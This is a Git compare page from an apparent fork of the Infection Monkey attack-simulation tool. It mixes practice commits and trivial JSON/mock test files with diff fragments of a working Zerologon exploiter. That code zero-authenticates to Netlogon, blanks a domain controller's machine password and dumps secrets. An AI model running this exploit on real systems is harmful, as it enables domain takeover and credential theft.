Compare commits

..

34 Commits

Author SHA1 Message Date
p34709852 994f7de8e3 Update README.md 2022-10-12 13:27:11 +08:00
wutao dedde27c8c 11222223333 2022-10-11 15:35:25 +08:00
wutao 1d0f3c8e50 测试1111111111 2022-10-11 14:38:05 +08:00
wutao 25054d8479 Merge branch 'develop' of http://111.8.36.180:3000/p15670423/monkey into develop 2022-10-11 14:37:24 +08:00
wutao 5273769ca7 测试 2022-10-11 14:37:03 +08:00
p15670423 c4b2f4d171 Delete 'test_dumps03.py' 2022-10-11 14:01:23 +08:00
p15670423 bfe3e6da58 Delete 'test_dumps01.py' 2022-10-11 14:01:10 +08:00
p15670423 dbab067af5 Delete 'test03.txt' 2022-10-11 14:00:54 +08:00
p15670423 453dd67e03 Delete 'requirements.txt' 2022-10-11 14:00:45 +08:00
p15670423 386bbf84b2 ddfyas
ysdf
Co-authored-by: p15670423 <p15670423@example.org>
Co-committed-by: p15670423 <p15670423@example.org>
2022-10-11 14:00:25 +08:00
p15670423 4cd9fd289e Delete 'test_dumps03.py' 2022-10-11 13:59:36 +08:00
p15670423 ffdf699f32 Delete 'test_dumps01.py' 2022-10-11 13:59:26 +08:00
p15670423 036742925c Delete 'test03.txt' 2022-10-11 13:59:16 +08:00
p15670423 017d109a77 Delete 'requirements.txt' 2022-10-11 13:58:46 +08:00
p15670423 14ea13c6ee ces
ceees
Co-authored-by: p15670423 <p15670423@example.org>
Co-committed-by: p15670423 <p15670423@example.org>
2022-10-11 13:56:30 +08:00
p15670423 00034313b1 Delete 'test03.txt' 2022-10-11 13:55:26 +08:00
p34709852 bef6e2c37f ADD file via upload 2022-10-11 13:50:14 +08:00
p34709852 f10c9f7e29 Delete 'requirements.txt' 2022-10-11 13:48:45 +08:00
p34709852 b0d3201186 Delete 'test_dumps03.py' 2022-10-11 13:47:11 +08:00
p15670423 73cc1994d9 Update test_dumps03.py 2022-10-11 13:42:14 +08:00
p15670423 9208f6691d Update requirements.txt 2022-10-11 13:41:56 +08:00
p15670423 73a326a3e3 no-ff
no-ff方式。。。。。。。。。。。
2022-10-11 13:30:17 +08:00
p15670423 4188bb507c Update test_dumps03.py 2022-10-11 13:30:17 +08:00
p34709852 7985a6b07f Add requirements.txt 2022-10-11 13:30:17 +08:00
p34709852 c8859701c8 ADD file via upload 2022-10-11 13:30:17 +08:00
p34709852 880a2d68e8 Delete 'test_dumps01.py' 2022-10-11 13:28:20 +08:00
p34709852 a47ca4dac8 ADD file via upload 2022-10-11 11:36:11 +08:00
p15670423 f803f88afc 确认合并
测试,,,,,,,,,,,,,,,,,,
2022-10-11 09:55:06 +08:00
p34709852 09b3b42dc5 ADD file via upload 2022-10-10 14:48:05 +08:00
p31829507 de18b55417 Add test_dumps.py 2022-10-10 14:39:32 +08:00
p31829507 9071fc90aa Add test_dumps 2022-10-10 14:38:31 +08:00
wutao 4505399049 测试:重复提交代码 2022-10-10 13:40:54 +08:00
wutao f5bfdc430c 测试:提交代码 2022-10-10 13:36:32 +08:00
wutao 0382831701 测试:提交代码 2022-10-10 13:34:44 +08:00
17 changed files with 215 additions and 288 deletions

View File

@ -29,7 +29,7 @@ Monkey on our [website](https://www.akamai.com/infectionmonkey).
For more information, or to apply, see the official job post:
- [Israel](https://akamaicareers.inflightcloud.com/jobdetails/aka_ext/028224?section=aka_ext&job=028224)
test1111
## Screenshots

13
c/test_dumps.py Normal file
View File

@ -0,0 +1,13 @@
import json
data = {
'name' : 'myname',
'age' : 100,
}
# separators:是分隔符的意思参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符后面的空格都除去了.
# dumps 将python对象字典转换为json字符串
json_str = json.dumps(data, separators=(',', ':'))
print(type(json_str), json_str)
# loads 将json字符串转化为python对象字典
pyton_obj = json.loads(json_str)
print(type(pyton_obj), pyton_obj)

1
ces.txt Normal file
View File

@ -0,0 +1 @@
是分为氛围

1
ces11.txt Normal file
View File

@ -0,0 +1 @@
123456

View File

@ -4,4 +4,3 @@ from .ping_scan_event import PingScanEvent
from .tcp_scan_event import TCPScanEvent
from .exploitation_event import ExploitationEvent
from .propagation_event import PropagationEvent
from .password_restoration_event import PasswordRestorationEvent

View File

@ -1,18 +0,0 @@
from ipaddress import IPv4Address
from . import AbstractAgentEvent
class PasswordRestorationEvent(AbstractAgentEvent):
"""
An event that occurs when a password has been restored on the target
system
Attributes:
:param target: The IP of the target system on which the
restoration was performed
:param success: If the password restoration was successful
"""
target: IPv4Address
success: bool

View File

@ -9,25 +9,21 @@ import os
import re
import tempfile
from binascii import unhexlify
from time import time
from typing import Dict, List, Optional, Sequence, Tuple
import impacket
from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
from impacket.dcerpc.v5.dtypes import NULL
from common.agent_events import CredentialsStolenEvent, PasswordRestorationEvent
from common.agent_events import CredentialsStolenEvent
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.credentials import Credentials, LMHash, NTHash, Username
from common.tags import (
T1003_ATTACK_TECHNIQUE_TAG,
T1098_ATTACK_TECHNIQUE_TAG,
T1210_ATTACK_TECHNIQUE_TAG,
)
from common.tags import T1003_ATTACK_TECHNIQUE_TAG, T1098_ATTACK_TECHNIQUE_TAG
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.wmi_tools import WmiTools
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
from infection_monkey.exploit.zerologon_utils.vuln_assessment import connect_to_dc, get_dc_details
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
from infection_monkey.i_puppet import ExploiterResultData
from infection_monkey.utils.capture_output import StdoutCapture
@ -38,7 +34,7 @@ logger = logging.getLogger(__name__)
ZEROLOGON_EXPLOITER_TAG = "zerologon-exploiter"
CREDENTIALS_STOLEN_EVENT_TAGS = frozenset(
ZEROLOGON_EVENT_TAGS = frozenset(
{
ZEROLOGON_EXPLOITER_TAG,
T1003_ATTACK_TECHNIQUE_TAG,
@ -46,19 +42,9 @@ CREDENTIALS_STOLEN_EVENT_TAGS = frozenset(
}
)
PASSWORD_RESTORATION_EVENT_TAGS = frozenset({ZEROLOGON_EXPLOITER_TAG})
class ZerologonExploiter(HostExploiter):
_EXPLOITED_SERVICE = "Netlogon"
_EXPLOITER_TAGS = (
ZEROLOGON_EXPLOITER_TAG,
T1003_ATTACK_TECHNIQUE_TAG,
T1098_ATTACK_TECHNIQUE_TAG,
T1210_ATTACK_TECHNIQUE_TAG,
)
_PROPAGATION_TAGS: Tuple[str, ...] = tuple()
MAX_ATTEMPTS = 2000 # For 2000, expected average number of attempts needed: 256.
ERROR_CODE_ACCESS_DENIED = 0xC0000022
@ -75,8 +61,8 @@ class ZerologonExploiter(HostExploiter):
def _exploit_host(self) -> ExploiterResultData:
self.dc_ip, self.dc_name, self.dc_handle = get_dc_details(self.host)
authenticated, rpc_con = self.authenticate()
if authenticated:
can_exploit, rpc_con = is_exploitable(self)
if can_exploit:
logger.info("Target vulnerable, changing account password to empty string.")
if self._is_interrupted():
@ -87,7 +73,7 @@ class ZerologonExploiter(HostExploiter):
logger.debug("Attempting exploit.")
_exploited = self._send_exploit_rpc_login_requests(rpc_con)
rpc_con.disconnect() # type: ignore[union-attr]
rpc_con.disconnect()
else:
logger.info(
@ -113,107 +99,39 @@ class ZerologonExploiter(HostExploiter):
return self.exploit_result
def authenticate(self) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
"""
Attempt to authenticate with the domain controller
:return:
- Whether or not authentication was successful
- An RPC connection on success, otherwise None
"""
# Connect to the DC's Netlogon service.
try:
rpc_con = connect_to_dc(self.dc_ip)
except Exception as err:
error_message = f"Exception occurred while connecting to DC: {err}"
logger.info(error_message)
return False, None
# Try authenticating.
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
timestamp = time()
try:
rpc_con_auth_result = self._try_zero_authenticate(rpc_con)
if rpc_con_auth_result is not None:
return True, rpc_con_auth_result
error_message = "Failed to authenticate with domain controller"
self._publish_exploitation_event(timestamp, False, error_message=error_message)
except Exception as err:
error_message = f"Error occured while authenticating to {self.host}: {err}"
logger.info(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return False, None
return False, None
def _try_zero_authenticate(self, rpc_con: rpcrt.DCERPC_v5) -> rpcrt.DCERPC_v5:
plaintext = b"\x00" * 8
ciphertext = b"\x00" * 8
flags = 0x212FFFFF
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
rpc_con,
self.dc_handle + "\x00",
self.dc_name + "\x00",
plaintext,
)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con,
self.dc_handle + "\x00",
self.dc_name + "$\x00",
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
self.dc_name + "\x00",
ciphertext,
flags,
)
assert server_auth["ErrorCode"] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
if (
ex.get_error_code() == 0xC0000022
): # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
raise Exception(f"Unexpected error code: {ex.get_error_code()}.")
except BaseException as ex:
raise Exception(f"Unexpected error: {ex}.")
@staticmethod
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
rpc_con = rpc_transport.get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
exploit_attempt_result, timestamp = self.try_exploit_attempt(rpc_con)
exploit_attempt_result = self.try_exploit_attempt(rpc_con)
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result, timestamp)
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result)
if is_exploited:
return True
return False
def try_exploit_attempt(self, rpc_con) -> Tuple[Optional[object], float]:
error_message = ""
timestamp = time()
def try_exploit_attempt(self, rpc_con) -> Optional[object]:
try:
exploit_attempt_result = self.attempt_exploit(rpc_con)
return exploit_attempt_result, timestamp
except nrpc.DCERPCSessionError as err:
return exploit_attempt_result
except nrpc.DCERPCSessionError as e:
# Failure should be due to a STATUS_ACCESS_DENIED error.
# Otherwise, the attack is probably not working.
if err.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
error_message = f"Unexpected error code from DC: {err.get_error_code()}"
logger.info(error_message)
except Exception as err:
error_message = f"Unexpected error: {err}"
logger.info(error_message)
if e.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
logger.info(f"Unexpected error code from DC: {e.get_error_code()}")
except BaseException as e:
logger.info(f"Unexpected error: {e}")
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return None, timestamp
return None
def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
request = nrpc.NetrServerPasswordSet2()
@ -234,24 +152,19 @@ class ZerologonExploiter(HostExploiter):
request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
request["Authenticator"] = authenticator
def assess_exploit_attempt_result(self, exploit_attempt_result, timestamp: float) -> bool:
def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool:
if exploit_attempt_result:
if exploit_attempt_result["ErrorCode"] == 0:
self.report_login_attempt(result=True, user=self.dc_name)
_exploited = True
logger.info("Exploit complete!")
self._publish_exploitation_event(timestamp, True)
else:
self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False
error_message = (
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
"Something went wrong."
logger.info(
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something "
f"went wrong."
)
logger.info(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return _exploited
return False
@ -289,7 +202,7 @@ class ZerologonExploiter(HostExploiter):
# Connect to the DC's Netlogon service.
try:
rpc_con = connect_to_dc(self.dc_ip)
rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip)
except Exception as e:
logger.info(f"Exception occurred while connecting to DC: {str(e)}")
return False
@ -397,8 +310,7 @@ class ZerologonExploiter(HostExploiter):
) -> None:
credentials_stolen_event = CredentialsStolenEvent(
source=get_agent_id(),
target=self.host.ip_addr,
tags=CREDENTIALS_STOLEN_EVENT_TAGS,
tags=ZEROLOGON_EVENT_TAGS,
stolen_credentials=extracted_credentials,
)
self.agent_event_queue.publish(credentials_stolen_event)
@ -566,22 +478,11 @@ class ZerologonExploiter(HostExploiter):
def assess_restoration_attempt_result(self, restoration_attempt_result) -> bool:
if restoration_attempt_result:
self._publish_password_restoration_event(success=True)
logger.debug("DC machine account password should be restored to its original value.")
return True
self._publish_password_restoration_event(success=False)
return False
def _publish_password_restoration_event(self, success: bool):
password_restoration_event = PasswordRestorationEvent(
source=get_agent_id(),
target=self.host.ip_addr,
tags=PASSWORD_RESTORATION_EVENT_TAGS,
success=success,
)
self.agent_event_queue.publish(password_restoration_event)
class NetrServerPasswordSet(nrpc.NDRCALL):
opnum = 6

View File

@ -1,26 +1,17 @@
import logging
from typing import Tuple
from typing import Optional, Tuple
import nmb.NetBIOS
from impacket.dcerpc.v5 import epm, nrpc, transport
from impacket.dcerpc.v5 import nrpc, rpcrt
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
from common.utils.exceptions import DomainControllerNameFetchError
from infection_monkey.model import VictimHost
from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__)
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
rpc_con = rpc_transport.get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def get_dc_details(host: VictimHost) -> Tuple[str, str, str]:
dc_ip = host.ip_addr
dc_name = _get_dc_name(dc_ip=dc_ip)
@ -43,3 +34,65 @@ def _get_dc_name(dc_ip: str) -> str:
raise DomainControllerNameFetchError(
"Couldn't get domain controller's name, maybe it's on external network?"
)
def is_exploitable(zerologon_exploiter_object) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
# Connect to the DC's Netlogon service.
try:
rpc_con = zerologon_exploiter_object.connect_to_dc(zerologon_exploiter_object.dc_ip)
except Exception as e:
logger.info(f"Exception occurred while connecting to DC: {str(e)}")
return False, None
# Try authenticating.
for _ in interruptible_iter(
range(0, zerologon_exploiter_object.MAX_ATTEMPTS), zerologon_exploiter_object.interrupt
):
try:
rpc_con_auth_result = _try_zero_authenticate(zerologon_exploiter_object, rpc_con)
if rpc_con_auth_result is not None:
return True, rpc_con_auth_result
except Exception as ex:
logger.info(ex)
return False, None
return False, None
def _try_zero_authenticate(zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5) -> rpcrt.DCERPC_v5:
plaintext = b"\x00" * 8
ciphertext = b"\x00" * 8
flags = 0x212FFFFF
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
rpc_con,
zerologon_exploiter_object.dc_handle + "\x00",
zerologon_exploiter_object.dc_name + "\x00",
plaintext,
)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con,
zerologon_exploiter_object.dc_handle + "\x00",
zerologon_exploiter_object.dc_name + "$\x00",
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
zerologon_exploiter_object.dc_name + "\x00",
ciphertext,
flags,
)
assert server_auth["ErrorCode"] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
if (
ex.get_error_code() == 0xC0000022
): # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
raise Exception(f"Unexpected error code: {ex.get_error_code()}.")
except BaseException as ex:
raise Exception(f"Unexpected error: {ex}.")

View File

@ -1,76 +0,0 @@
from ipaddress import IPv4Address
from uuid import UUID
import pytest
from common.agent_events import PasswordRestorationEvent
TARGET_IP_STR = "192.168.1.10"
AGENT_ID = UUID("012e7238-7b81-4108-8c7f-0787bc3f3c10")
TIMESTAMP = 1664371327.4067292
PASSWORD_RESTORATION_EVENT = PasswordRestorationEvent(
source=AGENT_ID,
timestamp=TIMESTAMP,
target=IPv4Address(TARGET_IP_STR),
success=True,
)
PASSWORD_RESTORATION_OBJECT_DICT = {
"source": AGENT_ID,
"timestamp": TIMESTAMP,
"target": IPv4Address(TARGET_IP_STR),
"success": True,
}
PASSWORD_RESTORATION_SIMPLE_DICT = {
"source": str(AGENT_ID),
"timestamp": TIMESTAMP,
"target": TARGET_IP_STR,
"success": "true",
}
@pytest.mark.parametrize(
"password_restoration_event_dict",
[PASSWORD_RESTORATION_OBJECT_DICT, PASSWORD_RESTORATION_SIMPLE_DICT],
)
def test_constructor(password_restoration_event_dict):
assert PasswordRestorationEvent(**password_restoration_event_dict) == PASSWORD_RESTORATION_EVENT
@pytest.mark.parametrize(
"key, value",
[
("target", None),
("success", "not-a-bool"),
],
)
def test_construct_invalid_field__type_error(key, value):
invalid_type_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
invalid_type_dict[key] = value
with pytest.raises(TypeError):
PasswordRestorationEvent(**invalid_type_dict)
@pytest.mark.parametrize(
"key, value",
[
("target", "not-an-ip"),
],
)
def test_construct_invalid_field__value_error(key, value):
invalid_type_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
invalid_type_dict[key] = value
with pytest.raises(ValueError):
PasswordRestorationEvent(**invalid_type_dict)
def test_construct__extra_fields_forbidden():
extra_field_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
extra_field_dict["extra_field"] = 99 # red balloons
with pytest.raises(ValueError):
PasswordRestorationEvent(**extra_field_dict)

View File

@ -1,11 +1,7 @@
from unittest.mock import MagicMock
import pytest
from common.agent_events import ExploitationEvent, PasswordRestorationEvent
from common.event_queue import IAgentEventQueue
from infection_monkey.model import VictimHost
DOMAIN_NAME = "domain-name"
IP = "0.0.0.0"
NETBIOS_NAME = "NetBIOS Name"
USERS = ["Administrator", "Bob"]
@ -15,12 +11,7 @@ NT_HASHES = ["def456", "765vut"]
@pytest.fixture
def mock_agent_event_queue():
return MagicMock(spec=IAgentEventQueue)
@pytest.fixture
def zerologon_exploiter_object(monkeypatch, mock_agent_event_queue):
def zerologon_exploiter_object(monkeypatch):
from infection_monkey.exploit.zerologon import ZerologonExploiter
def mock_report_login_attempt(**kwargs):
@ -29,57 +20,37 @@ def zerologon_exploiter_object(monkeypatch, mock_agent_event_queue):
obj = ZerologonExploiter()
monkeypatch.setattr(obj, "dc_name", NETBIOS_NAME, raising=False)
monkeypatch.setattr(obj, "report_login_attempt", mock_report_login_attempt)
monkeypatch.setattr(obj, "host", VictimHost(ip_addr="1.1.1.1"))
monkeypatch.setattr(obj, "agent_event_queue", mock_agent_event_queue)
return obj
@pytest.mark.slow
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object, mock_agent_event_queue):
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode": 0}
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result, 0)
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is ExploitationEvent
assert mock_agent_event_queue.publish.call_args[0][0].success
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)
@pytest.mark.slow
def test_assess_exploit_attempt_result_with_error(
zerologon_exploiter_object, mock_agent_event_queue
):
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode": 1}
assert not zerologon_exploiter_object.assess_exploit_attempt_result(
dummy_exploit_attempt_result, 0
dummy_exploit_attempt_result
)
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is ExploitationEvent
assert not mock_agent_event_queue.publish.call_args[0][0].success
@pytest.mark.slow
def test_assess_restoration_attempt_result_restored(
zerologon_exploiter_object, mock_agent_event_queue
):
def test_assess_restoration_attempt_result_restored(zerologon_exploiter_object):
dummy_restoration_attempt_result = object()
assert zerologon_exploiter_object.assess_restoration_attempt_result(
dummy_restoration_attempt_result
)
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is PasswordRestorationEvent
assert mock_agent_event_queue.publish.call_args[0][0].success
@pytest.mark.slow
def test_assess_restoration_attempt_result_not_restored(
zerologon_exploiter_object, mock_agent_event_queue
):
def test_assess_restoration_attempt_result_not_restored(zerologon_exploiter_object):
dummy_restoration_attempt_result = False
assert not zerologon_exploiter_object.assess_restoration_attempt_result(
dummy_restoration_attempt_result
)
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is PasswordRestorationEvent
assert not mock_agent_event_queue.publish.call_args[0][0].success
@pytest.mark.slow

0
test009.txt Normal file
View File

13
test_dumps Normal file
View File

@ -0,0 +1,13 @@
import json
data = {
'name' : 'myname',
'age' : 100,
}
# separators:是分隔符的意思参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符后面的空格都除去了.
# dumps 将python对象字典转换为json字符串
json_str = json.dumps(data, separators=(',', ':'))
print(type(json_str), json_str)
# loads 将json字符串转化为python对象字典
pyton_obj = json.loads(json_str)
print(type(pyton_obj), pyton_obj)

13
test_dumps.py Normal file
View File

@ -0,0 +1,13 @@
import json
data = {
'name' : 'myname',
'age' : 100,
}
# separators:是分隔符的意思参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符后面的空格都除去了.
# dumps 将python对象字典转换为json字符串
json_str = json.dumps(data, separators=(',', ':'))
print(type(json_str), json_str)
# loads 将json字符串转化为python对象字典
pyton_obj = json.loads(json_str)
print(type(pyton_obj), pyton_obj)

View File

@ -7,13 +7,7 @@ from common.agent_configuration.agent_sub_configurations import (
CustomPBAConfiguration,
ScanTargetConfiguration,
)
from common.agent_events import (
ExploitationEvent,
PasswordRestorationEvent,
PingScanEvent,
PropagationEvent,
TCPScanEvent,
)
from common.agent_events import ExploitationEvent, PingScanEvent, PropagationEvent, TCPScanEvent
from common.credentials import Credentials, LMHash, NTHash
from common.tags import (
T1021_ATTACK_TECHNIQUE_TAG,
@ -342,7 +336,6 @@ T1222_ATTACK_TECHNIQUE_TAG
T1570_ATTACK_TECHNIQUE_TAG
HostExploiter._publish_propagation_event
HostExploiter._publish_exploitation_event
PasswordRestorationEvent
# pydantic base models
underscore_attrs_are_private

21
zmtest04/test_mock.py Normal file
View File

@ -0,0 +1,21 @@
import unittest
from mock import Mock
def VerifyPhone():
'''
校验用户手机号
'''
pass
class TestVerifyPhone(unittest.TestCase):
def test_verify_phone(self):
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
VerifyPhone = Mock(return_value=data)
self.assertEqual("success", VerifyPhone()["msg"]["result"])
print('测试用例')
if __name__ == '__main__':
unittest.main(verbosity=2)

View File

@ -0,0 +1,21 @@
import unittest
from mock import Mock
def VerifyPhone():
'''
校验用户手机号
'''
pass
class TestVerifyPhone(unittest.TestCase):
def test_verify_phone(self):
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
VerifyPhone = Mock(return_value=data)
self.assertEqual("success", VerifyPhone()["msg"]["result"])
print('测试用例')
if __name__ == '__main__':
unittest.main(verbosity=2)

21
zmtest05/test_mock.py Normal file
View File

@ -0,0 +1,21 @@
import unittest
from mock import Mock
def VerifyPhone():
'''
校验用户手机号
'''
pass
class TestVerifyPhone(unittest.TestCase):
def test_verify_phone(self):
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
VerifyPhone = Mock(return_value=data)
self.assertEqual("success", VerifyPhone()["msg"]["result"])
print('测试用例')
if __name__ == '__main__':
unittest.main(verbosity=2)